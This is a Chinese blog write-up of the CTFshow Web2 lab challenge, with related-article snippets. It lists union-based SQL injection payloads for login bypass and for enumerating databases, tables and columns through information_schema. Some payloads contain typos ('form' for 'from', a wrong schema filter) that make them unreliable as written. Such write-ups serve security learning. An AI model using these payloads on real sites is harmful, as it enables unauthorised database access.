CTFshow--Web2,简单SQL注入

最新推荐文章于 2024-02-10 10:23:06 发布
最新推荐文章于 2024-02-10 10:23:06 发布
阅读量426 收藏
点赞数 1
分类专栏: 渗透测试 CTF练习 文章标签: 前端 sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46637933/article/details/123183781
版权
本文介绍了如何解决CTFshow中的一个Web2挑战,涉及SQL注入技巧。通过找到注入点,利用注释符绕过过滤,逐步揭示数据库名、表名和字段,最终获取目标信息。
摘要由CSDN通过智能技术生成

SQL注入先找到注入点,然后测试字段:admin' or 1=1 union select 1,2,3 <!-- 该题过滤了空格符,所以用/**/做了绕过

有回显则爆库名:admin' or 1=1 union select 1,database(),3

接着爆库内表:admin' or 1=1 union select 1,group_concat(table_name),3 form information_schema.tables where table_schema='web2' <!-- web2为第二部爆出的库名

接着爆表内字段:admin' or 1=1 union select 1,group_concat(column_name),3 form information_schema.columns where table_schema='flag' <!-- flag为第三步爆出的字段(为空直接查看)

最低0.47元/天 解锁文章
钟情Kali的菜鸡
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctf.show web2 最简单SQL注入
m0_46412682的博客
07-12 5148
ctf.show web2 最简单SQL注入 1、一开始的页面 随便输入用户名和密码看它怎么反应 没报错,只是清空了用户名和密码 题目提示是sql注入,那就用burpsuit抓个包,发送到repeater 点击go 既然是登录的页面,那就用万能密码 ’ or 1=1 #,出现欢迎您,ctfshow,说明登录成功,这里得说明一下username=admin’ or 1=1 #password=123这条语句,#号是注释符,所以后面的语句是被注释掉的,所以剩下username=admin’ or 1=1,o
Ctfshow——web2简单SQL注入
yu_19980401的博客
09-27 476
Ctfshow——web2 简单SQL注入 万能密码登录 username=admin'+or+1=1#&password=123 出现登录成功的提示 查询列数 username=admin'+or+1=1+order+by+1,2,3#&password=123 3回显正常,4无回显,判断有3列 查询数据库名 username=admin'+or+1=1+union+select+1,database(),3#&password=123 查询数据库内数据表 u
ctfshow web-2(sql注入)
m0_73303597的博客
11-21 1885
自用
CTF-web题之简单SQL注入
qq_25046827的博客
11-24 5135
这两天闲着没事报名了学校信安和网安组织的网络安全大赛,靠着仅有的一点web知识做了几道web题,现在记录一下其中一道sql注入题的解题思路 首先题面如下 首先通过语句判断有多少个字段: 1' or 1=1 order by 4 # 1' or 1=1 order by 3 # order by是按by后面的数字或字段名所在列进行排序,如果结果集只有3列,order by4则会报错,故可以用来判断结果集的字段数 第一条语句报错,第二条语句返回 admin 5ef582761f2cafceebdfc8c
CTF实验吧简单sql注入。自己写的wp!
qq_41326328的博客
05-04 1418
这次来写了一个wp,我是小白希望大神们可以指点,因为自己是一个人搞sql,有人指点能够少走很多弯路。 先看这一题,我刚进来居然还来了个乱码,不管了开始,看到这题目,命令注入得到flag,就想这一题无非就是绕过过滤,进行爆库爆数据得到flag 输入1,2,3以后,得到一些表名,这时就在猜想后台sql查询语句为:select name where id =xxxxx; 先判断注入点 先用1 an...
ctfshow sql注入系列2
m0_73500273的博客
07-14 107
看上面显示堆叠注入,先去网上搜一波什么是堆叠注入简单来说就是没有对一个查询语句判断,导致一个语句能够直接执行多个语句看题目。
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
Web安全主要关注Web应用中的漏洞,如SQL注入、跨站脚本攻击(XSS)、文件包含漏洞等。PHP是一种广泛使用的服务器端脚本语言,常用于构建动态网页,因此,理解PHP语法和特性对于解决这类问题至关重要。 【压缩包子文件...
vue+element-ui+websql
04-19
在“vue+element-ui+websql”这个项目中,开发者选择使用 Vue.js 作为基础框架来构建应用的逻辑和视图层。Vue.js 提供了双向数据绑定、虚拟DOM、指令系统等特性,使得开发者可以轻松地管理应用程序的状态和视图更新...
SQL注入-初入web安全-详细知识图谱
11-06
SQL注入初入Web安全详细知识图谱 SQL注入是一种常见的Web应用安全漏洞,指的是攻击者通过构造特殊的输入参数,来改变原始的SQL语句,使得数据库服务器执行恶意的SQL语句,从而达到非法访问或控制数据库的目的。SQL...
Secure-Systems-of-SQL-Injection-Attack:具有SQL注入漏洞的安全系统
05-01
Web应用程序带来了新型的计算机安全漏洞,例如SQL注入。 这是一类基于输入验证的漏洞。 SQL注入的典型用法是从数据库泄漏机密信息,绕过身份验证逻辑或向数据库中添加未经授权的帐户。 此安全性可防止未经授权访问您...
ctf题库--简单sql注入
miko2018的博客
08-21 5880
&lt;题目&gt; mysql报错注入 格式:flag{} 解题链接: http://ctf5.shiyanbar.com/web/index_3.php &lt;解答&gt; 1.打开题目链接,在查询中输入1,发现地址栏变化。 2.认为这里可能(看题目其实知道是一定)存在一个sql注入。 3.使用工具sqlmap进行注入(以该地址栏id值为例)。 查看当前数据库Sqlmap -u "...
「CTF」-「SQL」- 简单SQL注入1
小落的博客
10-26 594
简单SQL注入1 测试注入点 测试过滤规则 简单的添加一个union,发现没有过滤 (1union 这怎么有点像php弱类型了) 在union加一个空格以及一个and,发现union被过滤,那么可以猜测他的过滤规则和两端的空格有关。、 3. 查看到底有几个关键词被过滤了 1 union select group_concat(table_name) from informa...
CTF刷题总结(1)------简单SQL注入
qq_45047250的博客
04-25 1316
第一次写分享类的文章,有错误的地方还请大家多多指正哈!此篇文章主要分享一些刷web题目中会遇到的一些知识点,之后还会继续分享一些关于这方面的知识。 文章目录简单sql注入预备知识注入前判断如何判断注入顺序及操作总结 简单sql注入 预备知识 schema:可以代表数据库的组织和结构,其中schema和schemata的模式可以是表、列、数据类型、关系、主键等等。下面会通过例子来说明,大家可以自行体会。 information_schema: 是MySQL自带的信息数据库,用于存储数据库元数据(例如:数
WEB漏洞——SQL注入之简要SQL注入
qq_52589245的博客
10-06 2991
前言 sql注入是比较常见的网络攻击方式之一, 他不是利用操作系统的bug来实现攻击,而是针对程序员编写时的疏忽,通过sql语句,实现无账号登录,甚至篡改数据库sql简介 sql是一门ANSI的标准计算机语言, 用来访问和操作书序库系统。 sql语句用于取回和更新数据库中的数据。sql可与数据库程序协同工作,比如MS Access, DB2 , informinx, mssql Server,Oracle, Sybase 以及其他数据库系统。 sql注入 ...
CTFshow web 2 简单SQL注入
qq_43039823的博客
07-23 199
打开题目显示是一个简单的登录界面,拿到题目,先试一下万能密码 admin' or 1=1# 123 没有限制的登陆成功,使用burp抓一下包,然后开始下一步。 bp抓包内容如下,发送到RP模块(重发器) 现在开始人工苦比的手动注入 首先是查看回显位 username=admin'or1=1unionselect1,2,3#&password=123 GO! 回显位确认为 2 下一步,爆库名 username=admin'or1=1uni...
web23最简单SQL注入
weixin_59453707的博客
08-08 242
打开靶场 首先随便输入adminadmin 没有报错,但是清空了 输入万能密匙1'or1=1# 同样被清空了 题目提示有sql注入,那就使用burp抓包,发送到repeater
【CTF】Web 简单SQL 通关教程
qq_45196785的博客
09-26 203
2、简单SQL,查看题目-启动动态环境。7、打印输出表名指定列名字段的值数据。Seesea CTF,注册地址,1、练习中心-题目列表-Web。5、列出指定数据库所有的表名。6、列出指定表名的所有列名。3、sqlmap测试。
ctfshow web入门 sql注入
最新发布
weixin_74427106的博客
02-10 2619
sql注入分为多种类型的注入,我将对ctfshow web入门的sql入门进行题目分类,并在最后对每种sql注入做一下总结;
ctfshow-web-web红包题
07-14
这可能导致一个被称为SQL注入的漏洞。 我们试图通过在参数中插入恶意代码来进行SQL注入攻击。我们发现当我们输入`' or 1=1 -- `时,查询结果会返回所有订单记录,而不仅仅是当前用户的订单。这表明成功利用了SQL...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值